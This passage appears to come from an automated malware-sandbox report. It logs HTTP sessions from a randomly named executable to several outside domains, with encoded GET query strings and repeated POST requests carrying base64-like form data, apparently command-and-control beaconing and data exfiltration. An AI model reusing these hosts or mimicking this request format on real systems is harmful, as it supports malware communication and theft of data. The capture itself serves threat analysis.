                                                                                                                                  32192.168.2.450039162.241.85.94804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:07.083199024 CET337OUTGET /pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VFmGun7k+OgTVa55bMMFTIrySnkbuGR/0SpbM9MqSGMTT7xM4Wr78d1TcVKTvouXhaRwabxiGuYorKU= HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.papampalli.shop
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:55:07.800890923 CET500INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:07 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  X-Redirect-By: WordPress
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Location: http://papampalli.shop/pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VFmGun7k+OgTVa55bMMFTIrySnkbuGR/0SpbM9MqSGMTT7xM4Wr78d1TcVKTvouXhaRwabxiGuYorKU=
                                                                                                                                  Content-Length: 0
                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  33192.168.2.4500403.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:12.916135073 CET600OUTPOST /63jz/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vincemachi.net
                                                                                                                                  Origin: http://www.vincemachi.net
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vincemachi.net/63jz/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 56 35 6b 74 36 54 70 38 68 53 57 4b 6c 75 46 31 56 38 72 50 4d 39 6b 57 36 63 42 56 43 49 4d 75 78 67 43 4a 6d 76 6a 41 56 63 50 39 6b 39 42 70 45 4a 52 32 6a 44 5a 49 2f 44 39 41 62 48 33 79 34 46 38 44 4d 56 49 4d 74 4d 68 73 6a 76 50 59 77 53 4d 61 6d 38 68 75 78 4b 44 58 30 59 4f 38 31 36 63 49 6a 44 6a 74 62 2b 63 42 55 7a 62 58 59 77 45 6a 42 4c 38 45 74 68 78 77 74 53 78 34 4c 54 70 48 50 4e 4d 65 58 49 2b 62 58 2b 63 6c 38 61 43 7a 44 4b 31 62 7a 71 6b 66 4c 62 79 4e 55 64 77 4f 78 4f 76 57 6b 4d 71 4b 37 38 55 77 6e 62 31 72 41 56 41 74 39 57 6c 67 4d 66 48 57 51 77 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=V5kt6Tp8hSWKluF1V8rPM9kW6cBVCIMuxgCJmvjAVcP9k9BpEJR2jDZI/D9AbH3y4F8DMVIMtMhsjvPYwSMam8huxKDX0YO816cIjDjtb+cBUzbXYwEjBL8EthxwtSx4LTpHPNMeXI+bX+cl8aCzDK1bzqkfLbyNUdwOxOvWkMqK78Uwnb1rAVAt9WlgMfHWQw==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  34192.168.2.4500413.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:15.464133024 CET620OUTPOST /63jz/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vincemachi.net
                                                                                                                                  Origin: http://www.vincemachi.net
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vincemachi.net/63jz/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 56 35 6b 74 36 54 70 38 68 53 57 4b 6b 4f 56 31 54 66 7a 50 4c 64 6b 56 32 38 42 56 4d 6f 4d 71 78 67 4f 4a 6d 71 62 71 56 4f 62 39 6c 5a 46 70 57 63 6c 32 74 6a 5a 49 72 7a 39 42 45 58 33 37 34 46 78 2b 4d 55 30 4d 74 4d 31 73 6a 71 7a 59 78 6c 51 5a 67 73 68 6f 38 71 44 52 35 34 4f 38 31 36 63 49 6a 43 48 4c 62 36 34 42 55 44 72 58 4a 68 45 67 65 37 38 46 36 52 78 77 37 53 78 38 4c 54 70 6c 50 4d 41 6e 58 4b 47 62 58 2b 73 6c 2f 4f 57 79 59 36 31 64 33 71 6c 66 44 59 76 71 54 49 46 59 73 39 43 78 74 66 57 79 36 36 5a 71 32 71 55 38 53 56 6b 65 67 52 73 55 42 63 36 66 4c 37 31 6c 47 4d 63 47 64 6d 63 56 64 58 64 4e 73 51 74 42 6a 4f 63 3d
                                                                                                                                  Data Ascii: NBfdCRyH=V5kt6Tp8hSWKkOV1TfzPLdkV28BVMoMqxgOJmqbqVOb9lZFpWcl2tjZIrz9BEX374Fx+MU0MtM1sjqzYxlQZgsho8qDR54O816cIjCHLb64BUDrXJhEge78F6Rxw7Sx8LTplPMAnXKGbX+sl/OWyY61d3qlfDYvqTIFYs9CxtfWy66Zq2qU8SVkegRsUBc6fL71lGMcGdmcVdXdNsQtBjOc=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  35192.168.2.4500423.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:18.025716066 CET10702OUTPOST /63jz/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.vincemachi.net
                                                                                                                                  Origin: http://www.vincemachi.net
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.vincemachi.net/63jz/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 56 35 6b 74 36 54 70 38 68 53 57 4b 6b 4f 56 31 54 66 7a 50 4c 64 6b 56 32 38 42 56 4d 6f 4d 71 78 67 4f 4a 6d 71 62 71 56 4f 44 39 6b 71 4e 70 45 72 35 32 75 6a 5a 49 33 6a 39 45 45 58 32 35 34 47 41 35 4d 55 34 63 74 50 4e 73 68 4d 48 59 6c 41 6b 5a 75 73 68 6f 67 61 44 55 30 59 50 32 31 36 73 4d 6a 44 33 4c 62 36 34 42 55 42 7a 58 5a 41 45 67 63 37 38 45 74 68 78 30 74 53 78 55 4c 54 77 48 50 4d 55 33 58 62 6d 62 57 65 38 6c 7a 64 2b 79 55 36 31 66 36 4b 6c 78 44 59 6a 31 54 4f 68 69 73 38 33 57 74 59 2b 79 37 63 6c 79 6e 75 41 31 46 6d 38 76 39 68 59 54 49 4f 33 62 4f 63 34 5a 41 63 68 65 47 45 30 41 57 57 39 42 2f 68 6c 59 38 49 6c 54 70 65 53 6c 75 5a 31 6c 62 59 6f 67 4d 62 42 41 47 48 74 69 59 47 42 68 48 4e 70 71 68 6c 6e 4f 70 45 54 64 54 73 6a 41 79 55 54 55 2f 46 6e 46 2b 54 72 49 31 4c 39 4b 52 56 2b 53 6e 42 34 59 45 46 55 4b 51 35 45 32 31 33 35 78 32 44 4a 47 5a 65 74 77 74 4a 75 75 46 6e 69 42 54 76 61 58 6a 4c 6c 45 4a 44 79 65 37 6b 6b 46 6b 4a 6a 59 37 [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=V5kt6Tp8hSWKkOV1TfzPLdkV28BVMoMqxgOJmqbqVOD9kqNpEr52ujZI3j9EEX254GA5MU4ctPNshMHYlAkZushogaDU0YP216sMjD3Lb64BUBzXZAEgc78Ethx0tSxULTwHPMU3XbmbWe8lzd+yU61f6KlxDYj1TOhis83WtY+y7clynuA1Fm8v9hYTIO3bOc4ZAcheGE0AWW9B/hlY8IlTpeSluZ1lbYogMbBAGHtiYGBhHNpqhlnOpETdTsjAyUTU/FnF+TrI1L9KRV+SnB4YEFUKQ5E2135x2DJGZetwtJuuFniBTvaXjLlEJDye7kkFkJjY7asI594TEYlDFI2//eQkJFpB74eD1zahlwIHhXS9sswjPqD7MRWVSiKyCkjiNXMklK1ObYXsTeQwM3Q3L6oPRs6mf91PSzs6ctVWGXuHT/RkAsX9Kmcz1PGY7OAJluta6/gWyjSEKROhnggVP1txynWxf481qStqlR1IOoSCq3XKEvs1SqJywptmVGwGWRsyLiUMjWLjO9SynQkDlQDJi3xQ6CU3DwFkxQD4Nf+J7rk7q4DGHARrGfJbW0KnY7W9Sfhaoe6iAB9/kLyGyXmsKcSg/fLYX+upezEvf8d/1Ibeb4Z31Sdn3pLEFHa2XUvyb+A1dJtZ/yipkbYivlBqsx6/qsE7BviH7loVxLIuIkKdnPfk00aZ5V1rFJ6IJdLcZLiLO5vBll33WjjXwvq5e/Vp6WgZBGHpPrcwE8dZCp5ShwJ70t7wQ5bGpxzW/EUv7KKT0+Nvz3YNtLr9KqbVyswjA8rBpzNf2+ruXKGUAmkyjg9njq4jmOjqKRXXYmD9umAOKDQ4cRfjmk8YyUfu4XprwGzUKM781QR8HC9u/4IAMnb6uFeocjIip1SpeKpoc07wM9vR6O31Oj5nSJqpW377wjVOHMCl5cCX42Xdmx4wX9ZLtlufmY7eAK+O42RhI6SJUxzdM8Ltl5kZ7yNLg9c7h41ym/GeHWu [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  36192.168.2.4500433.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:20.678822041 CET336OUTGET /63jz/?NBfdCRyH=Y7MN5lBYnTzjm99OW+HGO4lB6bVNCK01+y2Ig/ngF4uhoYlhQ7ZSn0p3rCd0KVCOhlIFPm8MkscskcL5+iEPka975LzD1bzD94g3rz/lE+9/AEj4Pw0mfq0=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.vincemachi.net
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:55:21.250017881 CET404INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:21 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 264
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 42 66 64 43 52 79 48 3d 59 37 4d 4e 35 6c 42 59 6e 54 7a 6a 6d 39 39 4f 57 2b 48 47 4f 34 6c 42 36 62 56 4e 43 4b 30 31 2b 79 32 49 67 2f 6e 67 46 34 75 68 6f 59 6c 68 51 37 5a 53 6e 30 70 33 72 43 64 30 4b 56 43 4f 68 6c 49 46 50 6d 38 4d 6b 73 63 73 6b 63 4c 35 2b 69 45 50 6b 61 39 37 35 4c 7a 44 31 62 7a 44 39 34 67 33 72 7a 2f 6c 45 2b 39 2f 41 45 6a 34 50 77 30 6d 66 71 30 3d 26 5a 70 45 48 39 3d 54 6a 53 50 35 4c 58 58 62 4e 38 64 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NBfdCRyH=Y7MN5lBYnTzjm99OW+HGO4lB6bVNCK01+y2Ig/ngF4uhoYlhQ7ZSn0p3rCd0KVCOhlIFPm8MkscskcL5+iEPka975LzD1bzD94g3rz/lE+9/AEj4Pw0mfq0=&ZpEH9=TjSP5LXXbN8d4"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  37192.168.2.4500443.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:26.407049894 CET606OUTPOST /k8p1/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.smileyface.world
                                                                                                                                  Origin: http://www.smileyface.world
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.smileyface.world/k8p1/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 65 4b 35 50 61 44 35 38 38 39 62 64 33 7a 51 4b 4d 72 41 63 48 32 73 4b 44 53 64 56 67 31 59 39 64 44 46 39 6a 73 53 37 43 6c 78 53 74 64 53 38 34 64 68 6d 2f 61 44 72 37 78 48 75 30 72 4e 63 6e 65 67 32 6f 4b 76 65 6e 4e 35 6d 6a 49 6e 5a 34 47 4c 6b 32 30 4c 48 48 32 65 6b 48 51 47 76 4e 56 44 51 4c 46 49 49 4c 31 49 6d 4c 45 2b 31 61 32 62 6b 75 36 6d 36 6a 68 65 46 72 45 66 6e 32 70 47 65 31 59 31 69 30 74 6b 33 58 50 51 32 59 61 62 56 67 70 49 4d 37 61 79 47 50 4d 54 56 2b 6f 41 76 42 36 4c 57 69 66 44 67 55 44 41 73 31 68 7a 63 34 78 66 62 57 59 2f 74 2f 6b 52 46 66 41 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=eK5PaD5889bd3zQKMrAcH2sKDSdVg1Y9dDF9jsS7ClxStdS84dhm/aDr7xHu0rNcneg2oKvenN5mjInZ4GLk20LHH2ekHQGvNVDQLFIIL1ImLE+1a2bku6m6jheFrEfn2pGe1Y1i0tk3XPQ2YabVgpIM7ayGPMTV+oAvB6LWifDgUDAs1hzc4xfbWY/t/kRFfA==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  38192.168.2.4500453.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:28.946497917 CET626OUTPOST /k8p1/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.smileyface.world
                                                                                                                                  Origin: http://www.smileyface.world
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 225
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.smileyface.world/k8p1/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 65 4b 35 50 61 44 35 38 38 39 62 64 33 53 41 4b 4e 4d 30 63 51 47 73 4a 4d 79 64 56 70 56 59 35 64 44 4a 39 6a 74 57 72 43 54 4a 53 74 34 32 38 35 59 56 6d 2b 61 44 72 7a 52 48 76 36 4c 4e 62 6e 65 74 4c 6f 4b 54 65 6e 4e 74 6d 6a 4b 2f 5a 34 31 6a 6e 77 6b 4c 2f 4d 57 65 6d 5a 67 47 76 4e 56 44 51 4c 45 74 6c 4c 78 63 6d 4c 31 4f 31 63 6e 62 72 6e 61 6d 31 79 68 65 46 76 45 65 50 32 70 48 4c 31 61 52 49 30 76 63 33 58 4b 73 32 57 76 6e 57 33 35 49 4f 30 36 7a 75 49 50 4b 34 30 39 78 65 4d 63 62 75 6c 4d 79 59 56 46 4e 32 6b 51 53 4c 71 78 37 6f 4c 66 32 5a 79 6e 73 4d 45 4e 39 72 49 37 33 38 77 58 47 39 4a 5a 48 53 65 68 36 71 2f 31 6b 3d
                                                                                                                                  Data Ascii: NBfdCRyH=eK5PaD5889bd3SAKNM0cQGsJMydVpVY5dDJ9jtWrCTJSt4285YVm+aDrzRHv6LNbnetLoKTenNtmjK/Z41jnwkL/MWemZgGvNVDQLEtlLxcmL1O1cnbrnam1yheFvEeP2pHL1aRI0vc3XKs2WvnW35IO06zuIPK409xeMcbulMyYVFN2kQSLqx7oLf2ZynsMEN9rI738wXG9JZHSeh6q/1k=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  39192.168.2.4500463.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:31.497761011 CET10708OUTPOST /k8p1/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.smileyface.world
                                                                                                                                  Origin: http://www.smileyface.world
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.smileyface.world/k8p1/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 65 4b 35 50 61 44 35 38 38 39 62 64 33 53 41 4b 4e 4d 30 63 51 47 73 4a 4d 79 64 56 70 56 59 35 64 44 4a 39 6a 74 57 72 43 51 70 53 74 4b 2b 38 34 2f 4a 6d 73 71 44 72 35 78 48 79 36 4c 4e 4b 6e 64 63 41 6f 4b 65 6c 6e 50 56 6d 6c 5a 33 5a 6f 45 6a 6e 2b 6b 4c 2f 44 32 65 72 48 51 47 41 4e 56 53 34 4c 45 39 6c 4c 78 63 6d 4c 32 57 31 4e 32 62 72 6c 61 6d 36 6a 68 65 42 72 45 66 69 32 70 4f 77 31 61 46 79 31 65 38 33 58 71 63 32 62 39 50 57 6f 4a 49 49 34 61 7a 32 49 50 32 37 30 38 59 68 4d 63 48 49 6c 4c 43 59 55 55 74 73 78 79 36 50 33 44 75 36 56 64 43 35 71 55 59 65 41 76 77 65 47 4a 6a 4c 71 33 4c 53 49 75 6d 44 4b 41 2b 50 6d 44 4f 68 67 2b 57 68 4c 42 34 6f 4c 65 68 35 6e 52 67 62 48 54 4c 38 67 31 70 48 71 6c 65 72 54 4a 31 4e 4f 4d 75 31 6e 6d 4e 50 50 57 71 4d 68 6e 59 47 46 2f 56 61 62 65 5a 6d 77 78 57 4e 78 6f 62 78 70 48 62 77 56 2f 61 6e 44 6e 74 48 52 2b 30 46 6d 6d 46 41 44 2b 66 33 49 35 66 71 51 61 2f 62 42 45 69 72 4b 65 4b 58 6f 6e 4a 41 30 59 55 55 57 [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=eK5PaD5889bd3SAKNM0cQGsJMydVpVY5dDJ9jtWrCQpStK+84/JmsqDr5xHy6LNKndcAoKelnPVmlZ3ZoEjn+kL/D2erHQGANVS4LE9lLxcmL2W1N2brlam6jheBrEfi2pOw1aFy1e83Xqc2b9PWoJII4az2IP2708YhMcHIlLCYUUtsxy6P3Du6VdC5qUYeAvweGJjLq3LSIumDKA+PmDOhg+WhLB4oLeh5nRgbHTL8g1pHqlerTJ1NOMu1nmNPPWqMhnYGF/VabeZmwxWNxobxpHbwV/anDntHR+0FmmFAD+f3I5fqQa/bBEirKeKXonJA0YUUWqKkJGMDqAuwlqyKJ3YEM/UYuXeZkLuXp+eLaXV7C4cFFKAk7Go0pL+aP+u9j/ShklMDoa4gTJp8aSjqCFll9EaV+TN6K0L0Z2m6H5ud17/IjBgW0WgpwU26WpzgeuV/0H6NPxbyIcE75V4JoHQ95XOOwsfRgE/VuWoniZJZc270euPiYqpLElbwwdWaeJB3lDSDwkjwiv7uXP8iNA0Wq9ARZYyRdnvgU8rx3QCh3Ou2ui5qYryoyg7h9uiJbqgFMUHF0BbBJuvcMiAW9xD5G9XTjCiT/4yxhbFfephKgn/8XIIEiDHFpuAElQcXSnaVolzhQjXcaqRcEQILls8j5Yn8+ayupj6DQQYaG2muldssiXS8gY7c46+nq6b0mSyt4FiCMSzZdZbTNkst5CxvGZEn3HNEFR35Wh9Sq5F6rFqdx8gmuAcmQFEtIX6s3YfK6JDlSu4nqPQWq3bhl17ZDLkdpMmpW50kIUyW7tHLqXFz3g5ooNZ5Vm/wHfkksjsBlsIW5PW2DdOslCAAhQSG2oRrTlppFX0ddfoD6oJTYZQjo1HgERJ7Db5jAZYkLYkVpx4ASeu+HFsgSsuDOfcFO39F2AwxcgKJOIsEyoGCRouvrEpMUIJuUhXwLCFpwY081GuhWbTh3yXPlIgULW3znUDKg+gY+w0/roN [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  40192.168.2.4500473.33.130.190804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:34.034862041 CET338OUTGET /k8p1/?NBfdCRyH=TIRvZ0FNu+PTxQYcOfVqaGNCIAxVum4QZygpmrK4KUcSoYn7nfoJusX6oFzT9qJW++UysamPj8howLrz2mXV7hrlKmO9SSKkS1WwDkxbKxEbUBuudG7whrY=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.smileyface.world
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:55:34.665364981 CET404INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:34 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 264
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 42 66 64 43 52 79 48 3d 54 49 52 76 5a 30 46 4e 75 2b 50 54 78 51 59 63 4f 66 56 71 61 47 4e 43 49 41 78 56 75 6d 34 51 5a 79 67 70 6d 72 4b 34 4b 55 63 53 6f 59 6e 37 6e 66 6f 4a 75 73 58 36 6f 46 7a 54 39 71 4a 57 2b 2b 55 79 73 61 6d 50 6a 38 68 6f 77 4c 72 7a 32 6d 58 56 37 68 72 6c 4b 6d 4f 39 53 53 4b 6b 53 31 57 77 44 6b 78 62 4b 78 45 62 55 42 75 75 64 47 37 77 68 72 59 3d 26 5a 70 45 48 39 3d 54 6a 53 50 35 4c 58 58 62 4e 38 64 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NBfdCRyH=TIRvZ0FNu+PTxQYcOfVqaGNCIAxVum4QZygpmrK4KUcSoYn7nfoJusX6oFzT9qJW++UysamPj8howLrz2mXV7hrlKmO9SSKkS1WwDkxbKxEbUBuudG7whrY=&ZpEH9=TjSP5LXXbN8d4"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  41192.168.2.450048188.114.97.3804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:55:39.773663998 CET606OUTPOST /42jb/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.dodsrprolev.shop
                                                                                                                                  Origin: http://www.dodsrprolev.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.dodsrprolev.shop/42jb/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 38 4d 48 78 4d 6e 42 31 70 6b 6f 38 6e 57 6b 49 73 48 4a 30 53 55 32 64 34 5a 4a 67 47 70 4f 46 38 70 38 52 67 34 58 61 44 79 59 41 50 6b 57 4e 77 6c 67 4f 43 50 71 65 50 59 31 51 46 4e 49 42 38 69 6b 63 6a 2b 6f 6e 77 4d 61 74 71 46 58 58 2f 4b 37 65 56 70 31 71 53 58 30 62 4d 53 4c 72 43 39 76 63 47 61 66 45 35 6c 68 57 4c 59 4c 36 69 31 49 63 50 6b 65 45 51 71 32 61 74 43 5a 56 58 35 75 7a 44 4e 4f 38 53 37 57 35 67 79 44 43 51 4a 52 79 49 77 68 2b 59 57 64 79 6e 76 62 75 64 32 2f 73 37 61 6b 30 70 67 68 6d 37 6b 4b 31 77 44 49 48 30 4d 62 70 33 66 43 52 30 54 2f 6d 61 41 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=8MHxMnB1pko8nWkIsHJ0SU2d4ZJgGpOF8p8Rg4XaDyYAPkWNwlgOCPqePY1QFNIB8ikcj+onwMatqFXX/K7eVp1qSX0bMSLrC9vcGafE5lhWLYL6i1IcPkeEQq2atCZVX5uzDNO8S7W5gyDCQJRyIwh+YWdynvbud2/s7ak0pghm7kK1wDIH0Mbp3fCR0T/maA==
                                                                                                                                  Nov 7, 2024 12:55:40.571367025 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 07 Nov 2024 11:55:40 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
